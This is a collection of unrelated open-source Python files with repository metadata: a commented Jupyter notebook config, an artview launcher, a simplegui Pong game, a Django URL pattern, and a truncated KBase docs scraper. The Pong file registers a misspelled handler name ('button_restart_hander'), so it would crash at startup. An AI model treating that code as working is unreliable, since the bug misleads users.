## Supply overrides for terminado. Currently only supports "shell_command".
#c.NotebookApp.terminado_settings = {}
## Token used for authenticating first-time connections to the server.
#
# When no password is enabled, the default is to generate a new, random token.
#
# Setting to an empty string disables authentication altogether, which is NOT
# RECOMMENDED.
#c.NotebookApp.token = '<generated>'
## Supply overrides for the tornado.web.Application that the Jupyter notebook
# uses.
#c.NotebookApp.tornado_settings = {}
## Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-
# For headers sent by the upstream reverse proxy. Necessary if the proxy handles
# SSL.
#c.NotebookApp.trust_xheaders = False
## DEPRECATED, use tornado_settings
#c.NotebookApp.webapp_settings = {}
## The base URL for websockets, if it differs from the HTTP server (hint: it
# almost certainly doesn't).
#
# Should be in the form of an HTTP origin: ws[s]://hostname[:port]
#c.NotebookApp.websocket_url = ''
#------------------------------------------------------------------------------
# ConnectionFileMixin(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Mixin for configurable classes that work with connection files
## JSON file in which to store connection info [default: kernel-<pid>.json]
#
# This file will contain the IP, ports, and authentication key needed to connect
# clients to this kernel. By default, this file will be created in the security
# dir of the current profile, but can be specified by absolute path.
#c.ConnectionFileMixin.connection_file = ''
## set the control (ROUTER) port [default: random]
#c.ConnectionFileMixin.control_port = 0
## set the heartbeat port [default: random]
#c.ConnectionFileMixin.hb_port = 0
## set the iopub (PUB) port [default: random]
#c.ConnectionFileMixin.iopub_port = 0
## Set the kernel's IP address [default localhost]. If the IP address is
# something other than localhost, then Consoles on other machines will be able
# to connect to the Kernel, so be careful!
#c.ConnectionFileMixin.ip = ''
## set the shell (ROUTER) port [default: random]
#c.ConnectionFileMixin.shell_port = 0
## set the stdin (ROUTER) port [default: random]
#c.ConnectionFileMixin.stdin_port = 0
##
#c.ConnectionFileMixin.transport = 'tcp'
#------------------------------------------------------------------------------
# KernelManager(ConnectionFileMixin) configuration
#------------------------------------------------------------------------------
## Manages a single kernel in a subprocess on this host.
#
# This version starts kernels with Popen.
## Should we autorestart the kernel if it dies.
#c.KernelManager.autorestart = True
## DEPRECATED: Use kernel_name instead.
#
# The Popen Command to launch the kernel. Override this if you have a custom
# kernel. If kernel_cmd is specified in a configuration file, Jupyter does not
# pass any arguments to the kernel, because it cannot make any assumptions about
# the arguments that the kernel understands. In particular, this means that the
# kernel does not receive the option --debug if it is given on the Jupyter command
# line.
#c.KernelManager.kernel_cmd = []
## Time to wait for a kernel to terminate before killing it, in seconds.
#c.KernelManager.shutdown_wait_time = 5.0
#------------------------------------------------------------------------------
# Session(Configurable) configuration
#------------------------------------------------------------------------------
## Object for handling serialization and sending of messages.
#
# The Session object handles building messages and sending them with ZMQ sockets
# or ZMQStream objects. Objects can communicate with each other over the
# network via Session objects, and only need to work with the dict-based IPython
# message spec. The Session will handle serialization/deserialization, security,
# and metadata.
#
# Sessions support configurable serialization via packer/unpacker traits, and
# signing with HMAC digests via the key/keyfile traits.
#
# Parameters ----------
#
# debug : bool
# whether to trigger extra debugging statements
# packer/unpacker : str : 'json', 'pickle' or import_string
# importstrings for methods to serialize message parts. If just
# 'json' or 'pickle', predefined JSON and pickle packers will be used.
# Otherwise, the entire importstring must be used.
#
# The functions must accept at least valid JSON input, and output *bytes*.
#
# For example, to use msgpack:
# packer = 'msgpack.packb', unpacker='msgpack.unpackb'
# pack/unpack : callables
# You can also set the pack/unpack callables for serialization directly.
# session : bytes
# the ID of this Session object. The default is to generate a new UUID.
# username : unicode
# username added to message headers. The default is to ask the OS.
# key : bytes
# The key used to initialize an HMAC signature. If unset, messages
# will not be signed or checked.
# keyfile : filepath
# The file containing a key. If this is set, `key` will be initialized
# to the contents of the file.
## Threshold (in bytes) beyond which an object's buffer should be extracted to
# avoid pickling.
#c.Session.buffer_threshold = 1024
## Whether to check PID to protect against calls after fork.
#
# This check can be disabled if fork-safety is handled elsewhere.
#c.Session.check_pid = True
## Threshold (in bytes) beyond which a buffer should be sent without copying.
#c.Session.copy_threshold = 65536
## Debug output in the Session
#c.Session.debug = False
## The maximum number of digests to remember.
#
# The digest history will be culled when it exceeds this value.
#c.Session.digest_history_size = 65536
## The maximum number of items for a container to be introspected for custom
# serialization. Containers larger than this are pickled outright.
#c.Session.item_threshold = 64
## execution key, for signing messages.
#c.Session.key = b''
## path to file containing execution key.
#c.Session.keyfile = ''
## Metadata dictionary, which serves as the default top-level metadata dict for
# each message.
#c.Session.metadata = {}
## The name of the packer for serializing messages. Should be one of 'json',
# 'pickle', or an import name for a custom callable serializer.
#c.Session.packer = 'json'
## The UUID identifying this session.
#c.Session.session = ''
## The digest scheme used to construct the message signatures. Must have the form
# 'hmac-HASH'.
#c.Session.signature_scheme = 'hmac-sha256'
## The name of the unpacker for unserializing messages. Only used with custom
# functions for `packer`.
#c.Session.unpacker = 'json'
## Username for the Session. Default is your system username.
#c.Session.username = 'jovyan'
#------------------------------------------------------------------------------
# MultiKernelManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## A class for managing multiple kernels.
## The name of the default kernel to start
#c.MultiKernelManager.default_kernel_name = 'python3'
## The kernel manager class. This is configurable to allow subclassing of the
# KernelManager for customized behavior.
#c.MultiKernelManager.kernel_manager_class = 'jupyter_client.ioloop.IOLoopKernelManager'
#------------------------------------------------------------------------------
# MappingKernelManager(MultiKernelManager) configuration
#------------------------------------------------------------------------------
## A KernelManager that handles notebook mapping and HTTP error handling
##
#c.MappingKernelManager.root_dir = ''
#------------------------------------------------------------------------------
# ContentsManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## Base class for serving files and directories.
#
# This serves any text or binary file, as well as directories, with special
# handling for JSON notebook documents.
#
# Most APIs take a path argument, which is always an API-style unicode path, and
# always refers to a directory.
#
# - unicode, not url-escaped
# - '/'-separated
# - leading and trailing '/' will be stripped
# - if unspecified, path defaults to '',
# indicating the root path.
##
#c.ContentsManager.checkpoints = None
##
#c.ContentsManager.checkpoints_class = 'notebook.services.contents.checkpoints.Checkpoints'
##
#c.ContentsManager.checkpoints_kwargs = {}
## Glob patterns to hide in file and directory listings.
#c.ContentsManager.hide_globs = ['__pycache__', '*.pyc', '*.pyo', '.DS_Store', '*.so', '*.dylib', '*~']
## Python callable or importstring thereof
#
# To be called on a contents model prior to save.
#
# This can be used to process the structure, such as removing notebook outputs
# or other side effects that should not be saved.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(path=path, model=model, contents_manager=self)
#
# - model: the model to be saved. Includes file contents.
# Modifying this dict will affect the file that is stored.
# - path: the API path of the save destination
# - contents_manager: this ContentsManager instance
#c.ContentsManager.pre_save_hook = None
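# For example, a minimal hook that strips code-cell outputs before saving
# (a sketch; handles only nbformat 4 notebooks):
#
#   def scrub_output_pre_save(model, **kwargs):
#       """Remove outputs and execution counts from code cells before save."""
#       if model['type'] != 'notebook' or model['content']['nbformat'] != 4:
#           return
#       for cell in model['content']['cells']:
#           if cell['cell_type'] == 'code':
#               cell['outputs'] = []
#               cell['execution_count'] = None
#
#   c.ContentsManager.pre_save_hook = scrub_output_pre_save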
##
#c.ContentsManager.root_dir = '/'
## The base name used when creating untitled directories.
#c.ContentsManager.untitled_directory = 'Untitled Folder'
## The base name used when creating untitled files.
#c.ContentsManager.untitled_file = 'untitled'
## The base name used when creating untitled notebooks.
#c.ContentsManager.untitled_notebook = 'Untitled'
#------------------------------------------------------------------------------
# FileManagerMixin(Configurable) configuration
#------------------------------------------------------------------------------
## Mixin for ContentsAPI classes that interact with the filesystem.
#
# Provides facilities for reading, writing, and copying both notebooks and
# generic files.
#
# Shared by FileContentsManager and FileCheckpoints.
#
# Note ---- Classes using this mixin must provide the following attributes:
#
# root_dir : unicode
# A directory against which API-style paths are to be resolved.
#
# log : logging.Logger
## By default, notebooks are saved on disk to a temporary file and then, if
# successfully written, it replaces the old one. This procedure, namely
# 'atomic_writing', causes some bugs on file systems without operation order
# enforcement (like some networked filesystems). If set to False, the new
# notebook is written directly over the old one, which could fail (e.g. full
# filesystem or quota exceeded).
#c.FileManagerMixin.use_atomic_writing = True
#------------------------------------------------------------------------------
# FileContentsManager(FileManagerMixin,ContentsManager) configuration
#------------------------------------------------------------------------------
## Python callable or importstring thereof
#
# to be called on the path of a file just saved.
#
# This can be used to process the file on disk, such as converting the notebook
# to a script or HTML via nbconvert.
#
# It will be called as (all arguments passed by keyword)::
#
# hook(os_path=os_path, model=model, contents_manager=instance)
#
# - path: the filesystem path to the file just written
# - model: the model representing the file
# - contents_manager: this ContentsManager instance
#c.FileContentsManager.post_save_hook = None
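# For example, a hook that exports each saved notebook to a .py script with
# nbconvert (a sketch; assumes the `jupyter` command is on PATH):
#
#   import subprocess
#
#   def convert_to_script_post_save(model, os_path, contents_manager, **kwargs):
#       """Run nbconvert on the notebook that was just written to os_path."""
#       if model['type'] != 'notebook':
#           return
#       subprocess.check_call(
#           ['jupyter', 'nbconvert', '--to', 'script', os_path])
#
#   c.FileContentsManager.post_save_hook = convert_to_script_post_save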
##
#c.FileContentsManager.root_dir = ''
## DEPRECATED, use post_save_hook. Will be removed in Notebook 5.0
#c.FileContentsManager.save_script = False
#------------------------------------------------------------------------------
# NotebookNotary(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## A class for computing and verifying notebook signatures.
## The hashing algorithm used to sign notebooks.
#c.NotebookNotary.algorithm = 'sha256'
## The sqlite file in which to store notebook signatures. By default, this will
# be in your Jupyter data directory. You can set it to ':memory:' to disable
# sqlite writing to the filesystem.
#c.NotebookNotary.db_file = ''
## The secret key with which notebooks are signed.
#c.NotebookNotary.secret = b''
## The file where the secret key is stored.
#c.NotebookNotary.secret_file = ''
## A callable returning the storage backend for notebook signatures. The default
# uses an SQLite database.
#c.NotebookNotary.store_factory = traitlets.Undefined
#------------------------------------------------------------------------------
# KernelSpecManager(LoggingConfigurable) configuration
#------------------------------------------------------------------------------
## If there is no Python kernelspec registered and the IPython kernel is
# available, ensure it is added to the spec list.
#c.KernelSpecManager.ensure_native_kernel = True
## The kernel spec class. This is configurable to allow subclassing of the
# KernelSpecManager for customized behavior.
#c.KernelSpecManager.kernel_spec_class = 'jupyter_client.kernelspec.KernelSpec'
## Whitelist of allowed kernel names.
#
# By default, all installed kernels are allowed.
#c.KernelSpecManager.whitelist = set()
|
{
"content_hash": "f4afb663cd11451a410c7f921e3ee878",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 103,
"avg_line_length": 37.686354378818734,
"alnum_prop": 0.6754215304798963,
"repo_name": "agaveapi/SC17-container-tutorial",
"id": "158467a8aae395339c76326c9fd18efff66a46a4",
"size": "24124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "content/images/jupyter/jupyter_notebook_config.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "346832"
},
{
"name": "Jupyter Notebook",
"bytes": "716110"
},
{
"name": "Python",
"bytes": "26601"
},
{
"name": "Shell",
"bytes": "8830"
}
],
"symlink_target": ""
}
|
import sys
import os
path = os.path.dirname(sys.modules[__name__].__file__)
path = os.path.join(path, '..')
sys.path.insert(0, path)
import artview
def main(argv):
script, DirIn, filename, field = artview.parser.parse(argv)
if script:
artview.scripts.scripts[script](DirIn, filename, field)
else:
artview.run(DirIn, filename, field)
if __name__ == "__main__":
main(sys.argv)
|
{
"content_hash": "b6579cd5b687e60cb5fe2c2a30a89a68",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 63,
"avg_line_length": 20.65,
"alnum_prop": 0.639225181598063,
"repo_name": "jjhelmus/artview",
"id": "ba5523b60e8767eea1e8a3697d330b8bed5a5148",
"size": "463",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "artview/__main__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "447864"
}
],
"symlink_target": ""
}
|
import simplegui
# Import module, which contains functions that involve
# randomness.
import random
#---------------------------------------------------------
# Define and initialize global constants.
# Initialize global constants that will hold the "width"
# and "height" of the "canvas" ("Pong" table).
WIDTH = 600
HEIGHT = 400
# Initialize global constant that will hold the "radius"
# of the ball.
BALL_RADIUS = 20
# Initialize global constants that will hold the "width"
# and "height" of the "paddles".
PAD_WIDTH = 8
PAD_HEIGHT = 80
# as well as compute the "half" of those values.
HALF_PAD_WIDTH = PAD_WIDTH / 2
HALF_PAD_HEIGHT = PAD_HEIGHT / 2
# Initialize global constants that will determine the
# (horizontal) "direction" of the ball at the beginning
# of a new game.
LEFT = False
RIGHT = True
# Initialize global constants that will hold the "beginning"
# and the "end" limits of "speed" ranges concerning the
# horizontal and vertical "velocities", which will be
# generated as random numbers within those boundaries
# (pixels per update; 1/60 seconds) and according to the
# guidelines of this project.
BALL_VEL_x_RANGE_START = 120
BALL_VEL_x_RANGE_STOP = 240
BALL_VEL_y_RANGE_START = 60
BALL_VEL_y_RANGE_STOP = 180
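# For illustration (a sketch of the intended magnitudes):
# randrange(120, 240) // 60 yields a horizontal speed of 2 or 3 pixels per
# update, and randrange(60, 180) // 60 yields a vertical speed of 1 or 2.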
# Initialize global constant that will hold the "acceleration"
# of the (horizontal) ball "velocity".
# Increase the difficulty of the game, by increasing the
# "velocity" of the ball by 10% each time it strikes a
# "paddle".
BALL_VELOCITY_ACCELERATION = 1.1
# "Gutter" points.
# Whenever ball touches "gutter", "Player" gets "points".
POINTS = 1
# In this version of "Pong", the left and right "paddles"
# move up and down respectively at a constant "velocity".
VERTICAL_VELOCITY = 4
# Motion keys.
# If the "w" or "s" key is pressed, move up or down left
# "paddle". If the "up arrow" or "down arrow" key is
# pressed, move up or down right "paddle".
MOTION_KEYS = ["w", "s", "up", "down"]
# Each new game should start after these seconds from the
# time the "frame" opens or the time the "previous" game
# ends.
NEW_GAME_DELAY = 3
# Set general "draw" properties.
COLOR = 'White'
FONT_FACE = 'sans-serif'
FONT_SIZE = 50
LINE_WIDTH = 1
#---------------------------------------------------------
# Define and initialize global variables.
# Initialize global variable that will hold the horizontal
# and vertical "position" as well as "velocity" for the
# ball. Note: "velocity" = pixels per update; 1/60 seconds).
ball_pos = [WIDTH / 2, HEIGHT / 2]
ball_vel = [random.randrange(BALL_VEL_x_RANGE_START, BALL_VEL_x_RANGE_STOP) // 60,
random.randrange(BALL_VEL_y_RANGE_START, BALL_VEL_y_RANGE_STOP) // 60]
# Initialize global variables that will hold the vertical
# "positions" of the two "paddles", i.e. the vertical
# distance of the left and right "paddles" (centre of the
# "paddles") from the top of the "canvas" (table).
paddle1_pos = HEIGHT / 2
paddle2_pos = paddle1_pos
# Initialize global variables that will hold the vertical
# "velocities" of the "paddles".
paddle1_vel = 0
paddle2_vel = 0
# Initialize global variables that will hold the scores
# for each "Player".
score1 = 0
score2 = 0
# Initialize global variable that will keep
# track of the time in "seconds".
seconds = 0
#---------------------------------------------------------
def spawn_ball(direction):
"""
Initialize ball "position" and "velocity" for new ball
in the middle of the table. If "direction" is "RIGHT",
the ball's "velocity" is upper right, else upper left.
"""
# These are vectors stored as (global) "[x,y]" lists;
# ball "position" and "velocity".
global ball_pos, ball_vel
# Set ball "position" at the middle of the table.
ball_pos = [WIDTH / 2, HEIGHT / 2]
# Randomization to the "velocity". The exact values for
# the horizontal and vertical components of this
# "velocity" should be generated using "random.randrange()".
# This function returns a random integer "n" such that
# "start <= n < stop". For the horizontal and vertical
# "velocities", we generate a random number within the
# suggested "speed" limits (pixels per update;
# 1/60 seconds).
ball_vel[0] = random.randrange(BALL_VEL_x_RANGE_START, BALL_VEL_x_RANGE_STOP) // 60
ball_vel[1] = random.randrange(BALL_VEL_y_RANGE_START, BALL_VEL_y_RANGE_STOP) // 60
# The velocity of the ball should be upwards and towards
# the right.
if direction == RIGHT:
ball_vel = [ball_vel[0], -ball_vel[1]]
# The velocity of the ball should be upwards and towards
# the left.
else:
ball_vel = [-ball_vel[0], -ball_vel[1]]
return None
#---------------------------------------------------------
def new_game():
"""
    Initialize a new game by resetting the vertical "positions"
    and "velocities" of the "paddles" as well as the "score"
    of each "Player". Call "spawn_ball()" to initialize
    "position" and "velocity" for new ball. Start also a
    timer, which will "postpone" the beginning of a new
    game by the configured amount of time.
"""
# These are (global) numbers; vertical "position" of
# each "paddle".
global paddle1_pos, paddle2_pos
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# These are (global) numbers; "score" of each
# "Player".
global score1, score2
# Reset vertical positions of the two "paddles"
# (as global variables).
paddle1_pos = HEIGHT / 2
paddle2_pos = paddle1_pos
# Reset vertical "velocities" of the two "paddles"
# (as global variables).
paddle1_vel = 0
paddle2_vel = 0
# Reset "Player" scores (as global variables).
score1 = 0
score2 = 0
# Check if "Timer" is Running; if not, start the "Timer".
if not timer.is_running():
timer.start()
# Start a game of "Pong".
spawn_ball(RIGHT)
return None
#---------------------------------------------------------
def draw_handler(canvas):
"""
Event handler that is responsible for all drawing. It
receives "canvas" object and draws the "Pong" table,
the "moving" ball and the scores of each "Player".
It is also responsible for testing whether the ball
touches/collides with the "gutters" or the "paddles".
"""
# These are (global) numbers; vertical "position" of
# each "paddle".
global paddle1_pos, paddle2_pos
# These are (global) numbers; "score" of each "Player".
global score1, score2
# These are vectors stored as (global) "[x,y]" lists;
# ball "position" and "velocity".
global ball_pos, ball_vel
# This is (global) number; keeps track of the time in
# "seconds".
global seconds
# Draw middle line and "gutters" of "Pong" table.
canvas.draw_line([WIDTH / 2, 0], [WIDTH / 2, HEIGHT], LINE_WIDTH, COLOR)
canvas.draw_line([PAD_WIDTH, 0], [PAD_WIDTH, HEIGHT], LINE_WIDTH, COLOR)
canvas.draw_line([WIDTH - PAD_WIDTH, 0], [WIDTH - PAD_WIDTH, HEIGHT], LINE_WIDTH, COLOR)
# "Postpone" the beginning of new game if "Timer" is
# already running by "reseting" ball "position" at the
# middle of the table.
if timer.is_running():
ball_pos = [WIDTH / 2, HEIGHT / 2]
# Print message about the remaining time until the
# beginning of the new game by referencing the
# global "seconds" counter.
canvas.draw_text("new game will start in " +
str(NEW_GAME_DELAY - seconds) +
" seconds" +
("." * (NEW_GAME_DELAY - seconds)),
[WIDTH // 12, 3 * HEIGHT // 4], 3 * FONT_SIZE // 10, COLOR, FONT_FACE)
else:
# "Timer" has expired; update ball "position" for
# the new game.
ball_pos[0] += ball_vel[0]
ball_pos[1] += ball_vel[1]
# Test whether the ball touches/collides with the left
# "gutter" (offset from the left edge of the "canvas"
# by the width of the "paddle").
if ball_pos[0] <= (BALL_RADIUS + PAD_WIDTH):
# Check whether the ball is actually striking left
# "paddle" when it touches left "gutter". If so,
# reflect the ball back into play; ball's "velocity"
# increased by the "acceleration" configured.
if ((paddle1_pos - HALF_PAD_HEIGHT) <= ball_pos[1] <= (paddle1_pos + HALF_PAD_HEIGHT)):
ball_vel[0] = -ball_vel[0] * BALL_VELOCITY_ACCELERATION
else:
# Ball touched "gutter". Respawn the ball in
# the center of the table headed towards the
# opposite "gutter" and of course update score
# of "Player" 2 (right) by the "points"
# configured.
score2 += POINTS
# Start a game of "Pong". Start also a "Timer"
# to "postpone" the beginning of the new game.
if not timer.is_running():
timer.start()
spawn_ball(RIGHT)
# Test whether the ball touches/collides with the right
# "gutter" (offset from the right edge of the "canvas"
# by the width of the "paddle").
elif ball_pos[0] >= ((WIDTH - 1) - BALL_RADIUS - PAD_WIDTH):
# Check whether the ball is actually striking right
# "paddle" when it touches right "gutter". If so,
# reflect the ball back into play; ball's "velocity"
# increased by the "acceleration" configured.
if ((paddle2_pos - HALF_PAD_HEIGHT) <= ball_pos[1] <= (paddle2_pos + HALF_PAD_HEIGHT)):
ball_vel[0] = -ball_vel[0] * BALL_VELOCITY_ACCELERATION
else:
# Ball touched "gutter". Respawn the ball in
# the center of the table headed towards the
# opposite "gutter" and of course update score
# of "Player" 1 (left) by the "points"
# configured.
score1 += POINTS
# Start a game of "Pong". Start also a "Timer"
# to "postpone" the beginning of the new game.
if not timer.is_running():
timer.start()
spawn_ball(LEFT)
# Collide and reflect off of top side of the "canvas".
elif ball_pos[1] <= BALL_RADIUS:
ball_vel[1] = -ball_vel[1]
# Collide and reflect off of bottom side of the "canvas".
elif ball_pos[1] >= ((HEIGHT - 1) - BALL_RADIUS):
ball_vel[1] = -ball_vel[1]
# Draw a ball moving across the "Pong" table.
canvas.draw_circle(ball_pos, BALL_RADIUS, 2 * LINE_WIDTH, COLOR, COLOR)
# Update paddle's vertical "position", by
# referencing the two global variables that contain the
# vertical "velocities" of the "paddle". Keep "paddle"
# on the screen by calling the proper "helper" function.
if keep_paddle_on_screen(paddle1_pos, paddle1_vel):
paddle1_pos += paddle1_vel
if keep_paddle_on_screen(paddle2_pos, paddle2_vel):
paddle2_pos += paddle2_vel
# Draw left and right "paddles" in their respective
# "gutters".
canvas.draw_polygon([[0, paddle1_pos - HALF_PAD_HEIGHT],
[PAD_WIDTH, paddle1_pos - HALF_PAD_HEIGHT],
[PAD_WIDTH, paddle1_pos + HALF_PAD_HEIGHT],
[0, paddle1_pos + HALF_PAD_HEIGHT]],
LINE_WIDTH, COLOR, COLOR)
canvas.draw_polygon([[WIDTH - PAD_WIDTH, paddle2_pos - HALF_PAD_HEIGHT],
[WIDTH , paddle2_pos - HALF_PAD_HEIGHT],
[WIDTH, paddle2_pos + HALF_PAD_HEIGHT],
[WIDTH - PAD_WIDTH, paddle2_pos + HALF_PAD_HEIGHT]],
LINE_WIDTH, COLOR, COLOR)
# Draw scores;
# but first get the width of the "score" text in pixels
# for each "Player"; useful in (later) computing the
    # position to draw the "score" text - center-justified
    # on the "canvas field" of each player.
score_textwidth_in_px = frame.get_canvas_textwidth(str(score1), FONT_SIZE, FONT_FACE)
score_point_x = (WIDTH // 4) - (score_textwidth_in_px // 2)
score_point_y = (HEIGHT // 4)
canvas.draw_text(str(score1), [score_point_x, score_point_y], FONT_SIZE, COLOR, FONT_FACE)
score_textwidth_in_px = frame.get_canvas_textwidth(str(score2), FONT_SIZE, FONT_FACE)
score_point_x = (3 * WIDTH // 4) - (score_textwidth_in_px // 2)
score_point_y = (HEIGHT // 4)
canvas.draw_text(str(score2), [score_point_x, score_point_y], FONT_SIZE, COLOR, FONT_FACE)
return None
#---------------------------------------------------------
def keep_paddle_on_screen(paddle_pos, paddle_vel):
"""
    Helper function that restricts the "paddle" to stay entirely
on the "canvas" by testing whether the current update
for a paddle's "position" will move part of the "paddle"
off of the screen. If it does, don't allow the update by
returning a "False" boolean value; else return "True".
Function accepts current paddle's "vertical position"
and "vertical velocity".
"""
# Compute updated (future) position of the "paddle".
paddle_pos_updated = paddle_pos + paddle_vel
# "Paddle" will be "off" (False) or "on" (True) screen.
if (HALF_PAD_HEIGHT <= paddle_pos_updated <= (HEIGHT - HALF_PAD_HEIGHT)):
return True
else:
return False
#---------------------------------------------------------
def keydown_handler(key):
"""
Event key handler. Update the values of the two vertical
"velocities" using this "key" handler.
If key is pressed, "paddle" will start to move up or
down at a constant "velocity". When key is released,
"paddle" will stop moving.
"""
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# The "w" and "s" keys should control the vertical
# "velocity" of the left "paddle" while the "Up arrow"
# and "Down arrow" key should control the "velocity" of
# the right "paddle".
if key == simplegui.KEY_MAP[MOTION_KEYS[0]]:
# If the "w" key is pressed, move up left
# "paddle".
paddle1_vel -= VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[1]]:
# If the "s" key is pressed, move down left
# "paddle".
paddle1_vel += VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[2]]:
# If the "Up arrow" key is pressed, move up right
# "paddle".
paddle2_vel -= VERTICAL_VELOCITY
if key == simplegui.KEY_MAP[MOTION_KEYS[3]]:
# If the "Down arrow" key is pressed, move down
# right "paddle".
paddle2_vel += VERTICAL_VELOCITY
# else motionless if none of the above keys is pressed.
return None
#---------------------------------------------------------
def keyup_handler(key):
"""
Event key handler. Update the values of the two vertical
"velocities" using this "key" handler.
If key is pressed, "paddle" will start to move up or
down at a constant "velocity". When key is released,
"paddle" will stop moving.
"""
# These are (global) numbers; vertical "velocity" of
# each "paddle".
global paddle1_vel, paddle2_vel
# The "w" and "s" keys should control the vertical
# "velocity" of the left "paddle" while the "Up arrow"
# and "Down arrow" key should control the "velocity" of
# the right "paddle".
if key == simplegui.KEY_MAP[MOTION_KEYS[0]]:
# If the "w" key is released, stop moving up left
# "paddle".
paddle1_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[1]]:
# If the "s" key is released, stop moving down left
# "paddle".
paddle1_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[2]]:
# If the "Up arrow" key is released, stop moving up
# right "paddle".
paddle2_vel = 0
if key == simplegui.KEY_MAP[MOTION_KEYS[3]]:
# If the "Down arrow" key is released, stop moving
# down right "paddle".
paddle2_vel = 0
return None
#---------------------------------------------------------
#
def button_restart_handler():
"""
Event button handler. Call "new_game()" to reset the
"paddles", "score" and relaunch the ball. Reset also
a "Timer", which will "postpone" the beginning of a
    new game by the configured amount of time.
"""
# This is (global) number; keeps track of the time in
# "seconds".
global seconds
# Check if "Timer" is Running; if yes, stop the "Timer"
# and reset global "seconds" counter.
if timer.is_running():
seconds = 0
timer.stop()
# Reset the "paddles", "score", relaunch the ball and
# start the "Timer".
new_game()
return None
#---------------------------------------------------------
def timer_handler():
"""
Event handler for "Timer" with 1 sec interval, which
increments or resets a global "time" counter.
"""
# Increment "seconds" (as global variable)
# by one each time "Timer" calls this "event handler";
# i.e. once per 1 second.
global seconds
seconds += 1
# In case where "seconds" counter gets greater than the
# number of seconds configured as the "delay"
# between two successive games, reset counter and stop
# the "Timer".
if seconds > NEW_GAME_DELAY:
seconds = 0
timer.stop()
return None
#---------------------------------------------------------
# Create frame.
frame = simplegui.create_frame("Pong", WIDTH, HEIGHT)
# Create a "Timer" by repeatedly calling the proper
# "event handler" every 1 second.
timer = simplegui.create_timer(1000, timer_handler)
# Register the "event handler" that is responsible
# for all drawing.
frame.set_draw_handler(draw_handler)
# Register "event handlers" for "control" elements.
frame.set_keydown_handler(keydown_handler)
frame.set_keyup_handler(keyup_handler)
frame.add_button("Restart", button_restart_hander, 200)
# Get a game going (almost) immediately.
new_game()
# Start frame.
frame.start()
#---------------------------------------------------------
|
{
"content_hash": "840aa55de15d9a7e24cc62019260012c",
"timestamp": "",
"source": "github",
"line_count": 492,
"max_line_length": 115,
"avg_line_length": 38.0609756097561,
"alnum_prop": 0.5908896721136387,
"repo_name": "aristotelis-metsinis/ArcadeGames",
"id": "58c0b200c04ee94f844e9238ffab08f7bef4b94e",
"size": "19151",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pong.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "132391"
}
],
"symlink_target": ""
}
|
from django.conf.urls import patterns, url
urlpatterns = patterns(
'users.views',
url(r'^(?P<username>.+?)/$',
'user_profile',
name="user-profile"),
)
|
{
"content_hash": "22ab0661a39d6f54ab463434edce08d8",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 42,
"avg_line_length": 19.666666666666668,
"alnum_prop": 0.5819209039548022,
"repo_name": "lemonad/behorighet",
"id": "18643510f4649ab3ed33f890562fc32c62557e16",
"size": "201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "behorighet/users/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "405376"
},
{
"name": "JavaScript",
"bytes": "802587"
},
{
"name": "Python",
"bytes": "31496"
},
{
"name": "Shell",
"bytes": "222"
}
],
"symlink_target": ""
}
|
from bs4 import BeautifulSoup
#import requests
import sys
import urllib2
from HTMLParser import HTMLParser
DOCS_ROOT = 'http://www.kbase.us/services/docs/'
DEPLOY_DICT = [
{'name': 'CDM API',
'service': 'cdmi_api',
'target_dir':'kb_seed',
'html_name': 'application_api'},
{'name': 'CDM Entity-Relationship API',
'service': 'cdmi_api',
'target_dir':'kb_seed',
'html_name': 'er_api',
'html_target': 'cdmi_entity_api'},
{'name': 'ID Server API',
'service': 'idserver',
'target_dir':'idserver',
'html_name': 'idserver_client_api',
'html_target':'idserver_api'},
{'name': 'Workspace Service',
'service': 'workspaceService',
'target_dir':'workspace_service'},
#{'name': 'Assembly Service', #fixme
#'service': 'assembly',
#'target_dir': 'assembly',
#'html_name': 'assembly'}
#'html_target': 'assembly-service'},
{'name': 'Plant Expression Service',
'service': 'PlantExpressionService',
'target_dir':'plant_expression_service',
'html_name': 'PlantExpressionService'},
{'name': 'Tree Service',
'service': 'trees',
'target_dir':'trees',
'html_name': 'Tree',
'html_target':'tree'},
#{'name': 'Similarity Service',
#'service': 'sim_service',
#'target_dir':'sim_service',
#'html_name': 'sim_service'},
    {'name': 'Communities API',
'service': 'communities_api',
'target_dir':'communities',
'html_name': 'CommunitiesAPI'},
{'name': 'QC Service',
'service': 'communities_qc',
'target_dir':'communities_qc',
'html_name': 'communitiesQC'},
#{'name': 'Authorization Client',
#'service': 'authorization_server',
#'target_dir':'auth',
#'html_name': 'AuthUser',
#'html_target':},
{'name': 'Genome Annotation Service',
'service': 'genome_annotation',
'target_dir':'genome_annotation',
'html_name': 'genomeanno_impl'},
{'name': 'Translation Service',
'service': 'translation',
'target_dir':'translation',
'html_name': 'MOTranslationService',
'html_target':'MOTranslationService'},
{'name': 'Networks Service',
'service': 'KBaseNetworksService',
'target_dir':'networks',
'html_name': 'KBaseNetworksService'},
{'name': 'Ontology Service',
'service': 'ontology_service',
'html_name': 'OntologyService',
'target_dir':'ontology_service',
'html_target': 'OntologyService' },
{'name': 'Protein Info Service',
'service': 'protein_info_service',
'target_dir':'protein_info_service',
'html_name': 'ProteinInfoService'},
